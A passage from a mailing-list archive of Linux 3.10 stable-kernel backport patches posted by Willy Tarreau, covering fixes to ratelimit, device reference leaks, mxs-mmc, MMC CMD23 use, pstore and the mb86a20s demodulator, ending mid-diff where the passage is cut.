^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (186 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
                   ` (30 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jaewon Kim, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Jaewon Kim <jaewon31.kim@samsung.com>

commit c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.

rs->begin in ratelimit is set in two cases.
 1) when rs->begin was not initialized
 2) when rs->interval was passed

For case #2, current ratelimit sets the begin to 0.  This incurrs
improper suppression.  The begin value will be set in the next ratelimit
call by 1).  Then the time interval check will be always false, and
rs->printed will not be initialized.  Although enough time passed,
ratelimit may return 0 if rs->printed is not less than rs->burst.  To
reset interval properly, begin should be jiffies rather than 0.

For an example code below:

    static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
    for (i = 1; i <= 10; i++) {
        if (__ratelimit(&mylimit))
            printk("ratelimit test count %d\n", i);
        msleep(3000);
    }

test result in the current code shows suppression even there is 3 seconds sleep.

  [  78.391148] ratelimit test count 1
  [  81.295988] ratelimit test count 2
  [  87.315981] ratelimit test count 4
  [  93.336267] ratelimit test count 6
  [  99.356031] ratelimit test count 8
  [ 105.376367] ratelimit test count 10

Signed-off-by: Jaewon Kim <jaewon31.kim@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/ratelimit.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/ratelimit.c b/lib/ratelimit.c
index 40e03ea..2c5de86 100644
--- a/lib/ratelimit.c
+++ b/lib/ratelimit.c
@@ -49,7 +49,7 @@ int ___ratelimit(struct ratelimit_state *rs, const char *func)
 		if (rs->missed)
 			printk(KERN_WARNING "%s: %d callbacks suppressed\n",
 				func, rs->missed);
-		rs->begin   = 0;
+		rs->begin   = jiffies;
 		rs->printed = 0;
 		rs->missed  = 0;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (187 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
                   ` (29 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Lee Jones, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit 722f191080de641f023feaa7d5648caf377844f5 upstream.

Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().

Fixes: a9bbba996302 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mfd/mfd-core.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/mfd/mfd-core.c b/drivers/mfd/mfd-core.c
index 7604f4e..af6a245 100644
--- a/drivers/mfd/mfd-core.c
+++ b/drivers/mfd/mfd-core.c
@@ -263,6 +263,8 @@ int mfd_clone_cell(const char *cell, const char **clones, size_t n_clones)
 					clones[i]);
 	}
 
+	put_device(dev);
+
 	return 0;
 }
 EXPORT_SYMBOL(mfd_clone_cell);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (188 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
                   ` (28 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Johan Hovold, Rafael J . Wysocki, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.

Make sure to drop the reference taken by class_find_device() after
opening the RTC device.

Fixes: 77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/power/suspend_test.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/kernel/power/suspend_test.c b/kernel/power/suspend_test.c
index 269b097..743615b 100644
--- a/kernel/power/suspend_test.c
+++ b/kernel/power/suspend_test.c
@@ -169,8 +169,10 @@ static int __init test_suspend(void)
 
 	/* RTCs have initialized by now too ... can we use one? */
 	dev = class_find_device(rtc_class, NULL, NULL, has_wakealarm);
-	if (dev)
+	if (dev) {
 		rtc = rtc_class_open(dev_name(dev));
+		put_device(dev);
+	}
 	if (!rtc) {
 		printk(warn_no_rtc);
 		goto done;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (189 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
                   ` (27 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Fabio Estevam, Ulf Hansson, Willy Tarreau

From: Fabio Estevam <fabio.estevam@nxp.com>

commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mmc/host/mxs-mmc.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/mmc/host/mxs-mmc.c b/drivers/mmc/host/mxs-mmc.c
index 4278a17..f3a4232 100644
--- a/drivers/mmc/host/mxs-mmc.c
+++ b/drivers/mmc/host/mxs-mmc.c
@@ -674,13 +674,13 @@ static int mxs_mmc_probe(struct platform_device *pdev)
 
 	platform_set_drvdata(pdev, mmc);
 
+	spin_lock_init(&host->lock);
+
 	ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
 			       DRIVER_NAME, host);
 	if (ret)
 		goto out_free_dma;
 
-	spin_lock_init(&host->lock);
-
 	ret = mmc_add_host(mmc);
 	if (ret)
 		goto out_free_dma;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (190 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
                   ` (26 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Glöckner, Ulf Hansson, Willy Tarreau

From: Daniel Glöckner <dg@emlix.com>

commit 0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.

CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.

The patch fixes the following problem:

  mmc0: new MMC card at address 0001
  mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
  mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
  ...
  blk_update_request: I/O error, dev mmcblk0, sector 0
  Buffer I/O error on dev mmcblk0, logical block 0, async page read
   mmcblk0: unable to read partition table

Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mmc/card/block.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/mmc/card/block.c b/drivers/mmc/card/block.c
index a2863b7..ce34c49 100644
--- a/drivers/mmc/card/block.c
+++ b/drivers/mmc/card/block.c
@@ -2093,7 +2093,8 @@ static struct mmc_blk_data *mmc_blk_alloc_req(struct mmc_card *card,
 	set_capacity(md->disk, size);
 
 	if (mmc_host_cmd23(card->host)) {
-		if (mmc_card_mmc(card) ||
+		if ((mmc_card_mmc(card) &&
+		     card->csd.mmca_vsn >= CSD_SPEC_VER_3) ||
 		    (mmc_card_sd(card) &&
 		     card->scr.cmds & SD_SCR_CMD23_SUPPORT))
 			md->flags |= MMC_BLK_CMD23;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (191 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
                   ` (25 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sebastian Andrzej Siewior, Anton Vorontsov, Colin Cross,
	Kees Cook, Tony Luck, Rabin Vincent, Willy Tarreau

From: Sebastian Andrzej Siewior <bigeasy@linutronix.de>

commit d5a9bf0b38d2ac85c9a693c7fb851f74fd2a2494 upstream.

I have here a FPGA behind PCIe which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg based
updates and writes back 0xff…ff and returns the same.  This leads to
crash during crash rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and use the spinlock based version.

Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 43 ++-----------------------------------------
 1 file changed, 2 insertions(+), 41 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index 0b367ef..ee3c6ec 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -45,43 +45,10 @@ static inline size_t buffer_start(struct persistent_ram_zone *prz)
 	return atomic_read(&prz->buffer->start);
 }
 
-/* increase and wrap the start pointer, returning the old value */
-static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a)
-{
-	int old;
-	int new;
-
-	do {
-		old = atomic_read(&prz->buffer->start);
-		new = old + a;
-		while (unlikely(new >= prz->buffer_size))
-			new -= prz->buffer_size;
-	} while (atomic_cmpxchg(&prz->buffer->start, old, new) != old);
-
-	return old;
-}
-
-/* increase the size counter until it hits the max size */
-static void buffer_size_add_atomic(struct persistent_ram_zone *prz, size_t a)
-{
-	size_t old;
-	size_t new;
-
-	if (atomic_read(&prz->buffer->size) == prz->buffer_size)
-		return;
-
-	do {
-		old = atomic_read(&prz->buffer->size);
-		new = old + a;
-		if (new > prz->buffer_size)
-			new = prz->buffer_size;
-	} while (atomic_cmpxchg(&prz->buffer->size, old, new) != old);
-}
-
 static DEFINE_RAW_SPINLOCK(buffer_lock);
 
 /* increase and wrap the start pointer, returning the old value */
-static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
+static size_t buffer_start_add(struct persistent_ram_zone *prz, size_t a)
 {
 	int old;
 	int new;
@@ -101,7 +68,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
 }
 
 /* increase the size counter until it hits the max size */
-static void buffer_size_add_locked(struct persistent_ram_zone *prz, size_t a)
+static void buffer_size_add(struct persistent_ram_zone *prz, size_t a)
 {
 	size_t old;
 	size_t new;
@@ -122,9 +89,6 @@ exit:
 	raw_spin_unlock_irqrestore(&buffer_lock, flags);
 }
 
-static size_t (*buffer_start_add)(struct persistent_ram_zone *, size_t) = buffer_start_add_atomic;
-static void (*buffer_size_add)(struct persistent_ram_zone *, size_t) = buffer_size_add_atomic;
-
 static void notrace persistent_ram_encode_rs8(struct persistent_ram_zone *prz,
 	uint8_t *data, size_t len, uint8_t *ecc)
 {
@@ -426,9 +390,6 @@ static void *persistent_ram_iomap(phys_addr_t start, size_t size,
 		return NULL;
 	}
 
-	buffer_start_add = buffer_start_add_locked;
-	buffer_size_add = buffer_size_add_locked;
-
 	if (memtype)
 		va = ioremap(start, size);
 	else
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (192 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
                   ` (24 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Furquan Shaikh, Enric Balletbo Serra, Kees Cook, Willy Tarreau

From: Furquan Shaikh <furquan@google.com>

commit 7e75678d23167c2527e655658a8ef36a36c8b4d9 upstream.

persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.

Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index ee3c6ec..eb42483 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -263,7 +263,7 @@ static void notrace persistent_ram_update(struct persistent_ram_zone *prz,
 	const void *s, unsigned int start, unsigned int count)
 {
 	struct persistent_ram_buffer *buffer = prz->buffer;
-	memcpy(buffer->data + start, s, count);
+	memcpy_toio(buffer->data + start, s, count);
 	persistent_ram_update_ecc(prz, start, count);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (193 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
                   ` (23 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrew Bresticker, Enric Balletbo Serra, Kees Cook, Willy Tarreau

From: Andrew Bresticker <abrestic@chromium.org>

commit d771fdf94180de2bd811ac90cba75f0f346abf8d upstream.

The ramoops buffer may be mapped as either I/O memory or uncached
memory.  On ARM64, this results in a device-type (strongly-ordered)
mapping.  Since unnaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.

Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index eb42483..7df456d 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -286,8 +286,8 @@ void persistent_ram_save_old(struct persistent_ram_zone *prz)
 	}
 
 	prz->old_log_size = size;
-	memcpy(prz->old_log, &buffer->data[start], size - start);
-	memcpy(prz->old_log + size - start, &buffer->data[0], start);
+	memcpy_fromio(prz->old_log, &buffer->data[start], size - start);
+	memcpy_fromio(prz->old_log + size - start, &buffer->data[0], start);
 }
 
 int notrace persistent_ram_write(struct persistent_ram_zone *prz,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 296/319] mb86a20s: fix the locking logic
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (194 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
                   ` (22 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit dafb65fb98d85d8e78405e82c83e81975e5d5480 upstream.

On this frontend, it takes a while to start output normal
TS data. That only happens on state S9. On S8, the TS output
is enabled, but it is not reliable enough.

However, the zigzag loop is too fast to let it sync.

As, on practical tests, the zigzag software loop doesn't
seem to be helping, but just slowing down the tuning, let's
switch to hardware algorithm, as the tuners used on such
devices are capable of work with frequency drifts without
any help from software.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/dvb-frontends/mb86a20s.c | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
index 2c7217f..3fbac5f 100644
--- a/drivers/media/dvb-frontends/mb86a20s.c
+++ b/drivers/media/dvb-frontends/mb86a20s.c
@@ -321,7 +321,11 @@ static int mb86a20s_read_status(struct dvb_frontend *fe, fe_status_t *status)
 	if (val >= 7)
 		*status |= FE_HAS_SYNC;
 
-	if (val >= 8)				/* Maybe 9? */
+	/*
+	 * Actually, on state S8, it starts receiving TS, but the TS
+	 * output is only on normal state after the transition to S9.
+	 */
+	if (val >= 9)
 		*status |= FE_HAS_LOCK;
 
 	dev_dbg(&state->i2c->dev, "%s: Status = 0x%02x (state = %d)\n",
@@ -2080,6 +2084,11 @@ static void mb86a20s_release(struct dvb_frontend *fe)
 	kfree(state);
 }
 
+static int mb86a20s_get_frontend_algo(struct dvb_frontend *fe)
+{
+        return DVBFE_ALGO_HW;
+}
+
 static struct dvb_frontend_ops mb86a20s_ops;
 
 struct dvb_frontend *mb86a20s_attach(const struct mb86a20s_config *config,
@@ -2153,6 +2162,7 @@ static struct dvb_frontend_ops mb86a20s_ops = {
 	.read_status = mb86a20s_read_status_and_stats,
 	.read_signal_strength = mb86a20s_read_signal_strength_from_cache,
 	.tune = mb86a20s_tune,
+	.get_frontend_algo = mb86a20s_get_frontend_algo,
 };
 
 MODULE_DESCRIPTION("DVB Frontend module for Fujitsu mb86A20s hardware");
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 297/319] mb86a20s: fix demod settings
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (195 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
                   ` (21 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream.

With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
were still using experimental transmissions.

Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.

Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/dvb-frontends/mb86a20s.c | 92 ++++++++++++++++------------------
 1 file changed, 42 insertions(+), 50 deletions(-)

diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
index 3fbac5f..4a1346f 100644
--- a/drivers/media/dvb-frontends/mb86a20s.c
+++ b/drivers/media/dvb-frontends/mb86a20s.c
@@ -75,25 +75,27 @@ static struct regdata mb86a20s_init1[] = {
 };
 
 static struct regdata mb86a20s_init2[] = {
-	{ 0x28, 0x22 }, { 0x29, 0x00 }, { 0x2a, 0x1f }, { 0x2b, 0xf0 },
+	{ 0x50, 0xd1 }, { 0x51, 0x22 },
+	{ 0x39, 0x01 },
+	{ 0x71, 0x00 },
 	{ 0x3b, 0x21 },
-	{ 0x3c, 0x38 },
+	{ 0x3c, 0x3a },
 	{ 0x01, 0x0d },
-	{ 0x04, 0x08 }, { 0x05, 0x03 },
+	{ 0x04, 0x08 }, { 0x05, 0x05 },
 	{ 0x04, 0x0e }, { 0x05, 0x00 },
-	{ 0x04, 0x0f }, { 0x05, 0x37 },
-	{ 0x04, 0x0b }, { 0x05, 0x78 },
+	{ 0x04, 0x0f }, { 0x05, 0x14 },
+	{ 0x04, 0x0b }, { 0x05, 0x8c },
 	{ 0x04, 0x00 }, { 0x05, 0x00 },
-	{ 0x04, 0x01 }, { 0x05, 0x1e },
-	{ 0x04, 0x02 }, { 0x05, 0x07 },
-	{ 0x04, 0x03 }, { 0x05, 0xd0 },
+	{ 0x04, 0x01 }, { 0x05, 0x07 },
+	{ 0x04, 0x02 }, { 0x05, 0x0f },
+	{ 0x04, 0x03 }, { 0x05, 0xa0 },
 	{ 0x04, 0x09 }, { 0x05, 0x00 },
 	{ 0x04, 0x0a }, { 0x05, 0xff },
-	{ 0x04, 0x27 }, { 0x05, 0x00 },
+	{ 0x04, 0x27 }, { 0x05, 0x64 },
 	{ 0x04, 0x28 }, { 0x05, 0x00 },
-	{ 0x04, 0x1e }, { 0x05, 0x00 },
-	{ 0x04, 0x29 }, { 0x05, 0x64 },
-	{ 0x04, 0x32 }, { 0x05, 0x02 },
+	{ 0x04, 0x1e }, { 0x05, 0xff },
+	{ 0x04, 0x29 }, { 0x05, 0x0a },
+	{ 0x04, 0x32 }, { 0x05, 0x0a },
 	{ 0x04, 0x14 }, { 0x05, 0x02 },
 	{ 0x04, 0x04 }, { 0x05, 0x00 },
 	{ 0x04, 0x05 }, { 0x05, 0x22 },
@@ -101,8 +103,6 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x04, 0x07 }, { 0x05, 0xd8 },
 	{ 0x04, 0x12 }, { 0x05, 0x00 },
 	{ 0x04, 0x13 }, { 0x05, 0xff },
-	{ 0x04, 0x15 }, { 0x05, 0x4e },
-	{ 0x04, 0x16 }, { 0x05, 0x20 },
 
 	/*
 	 * On this demod, when the bit count reaches the count below,
@@ -156,42 +156,36 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x50, 0x51 }, { 0x51, 0x04 },		/* MER symbol 4 */
 	{ 0x45, 0x04 },				/* CN symbol 4 */
 	{ 0x48, 0x04 },				/* CN manual mode */
-
+	{ 0x50, 0xd5 }, { 0x51, 0x01 },
 	{ 0x50, 0xd6 }, { 0x51, 0x1f },
 	{ 0x50, 0xd2 }, { 0x51, 0x03 },
-	{ 0x50, 0xd7 }, { 0x51, 0xbf },
-	{ 0x28, 0x74 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xff },
-	{ 0x28, 0x46 }, { 0x29, 0x00 }, { 0x2a, 0x1a }, { 0x2b, 0x0c },
-
-	{ 0x04, 0x40 }, { 0x05, 0x00 },
-	{ 0x28, 0x00 }, { 0x2b, 0x08 },
-	{ 0x28, 0x05 }, { 0x2b, 0x00 },
+	{ 0x50, 0xd7 }, { 0x51, 0x3f },
 	{ 0x1c, 0x01 },
-	{ 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x1f },
-	{ 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x18 },
-	{ 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x12 },
-	{ 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x30 },
-	{ 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x37 },
-	{ 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
-	{ 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x09 },
-	{ 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x06 },
-	{ 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7b },
-	{ 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x76 },
-	{ 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7d },
-	{ 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x08 },
-	{ 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0b },
-	{ 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
-	{ 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf2 },
